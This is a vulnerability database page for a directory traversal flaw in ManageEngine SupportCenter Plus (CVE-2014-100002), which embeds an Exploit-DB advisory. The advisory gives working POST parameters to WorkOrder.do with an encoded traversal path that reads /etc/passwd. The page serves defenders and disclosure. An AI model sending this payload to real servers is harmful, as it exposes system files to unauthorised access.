CVE-2014-100002
Description
Directory traversal vulnerability in ManageEngine SupportCenter Plus 7.9 before 7917 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the attach parameter to WorkOrder.do in the file attachment for a new ticket.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
ManageEngine Support Center Plus 7916 - Directory Traversal
-----------
Author:
-----------
xistence < xistence[at]0x90[.]nl >
-------------------------
Affected products:
-------------------------
ManageEngine Support Center Plus 7916 and lower
-------------------------
Affected vendors:
-------------------------
ManageEngine
http://www.manageengine.com/
-------------------------
Product description:
-------------------------
SupportCenter Plus is a web-based customer support software that lets
organizations effectively manage customer tickets,
their account & contact information, the service contracts and in the
process providing a superior customer experience.
----------
Details:
----------
[ 0x01 - Directory Traversal ]
Support Center Plus 7916 and lower is prone to a directory traversal
vulnerability. When creating a ticket and attaching
a file, this can be tampered to link to a local file on the server side.
By downloading the attachment from the ticket, the server file is
downloaded with the same privileges as the
Support Center Plus instance, which on windows is SYSTEM. On linux Support
Center Plus is mostly installed as the root user.
POST parameters when submitting a ticket to the /WorkOrder.do url and
attaching the server /etc/passwd:
category=&MOD_IND=WorkOrder&attachments=passwd&subCategory=0&addWO=addWO&title=pwned&attPath=
&component=Request&reqTemplate=&reqName=Guest&priority=2&item=0&reqID=2&attSize=31337&autoCCList=
&FORMNAME=WorkOrderForm&usertypename=Requester
&attach=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&prodId=0&description=pwned
-----------
Solution:
-----------
Upgrade to a build higher than 7916.
--------------
Timeline:
--------------
Fixed somewhere back in 2013 :)
Metasploit modules
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| zohocorp | manageengine_supportcenter_plus | {"endIncluding":"7.9"} | |
References
- http://osvdb.org/show/osvdb/102656
- http://www.exploit-db.com/exploits/31262
- https://exchange.xforce.ibmcloud.com/vulnerabilities/90806
- https://supportcenter.wiki.zoho.com/ReadMe-V2.html
- http://osvdb.org/show/osvdb/102656
- http://www.exploit-db.com/exploits/31262
- https://exchange.xforce.ibmcloud.com/vulnerabilities/90806
- https://supportcenter.wiki.zoho.com/ReadMe-V2.html
CWEs
CWE-22
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.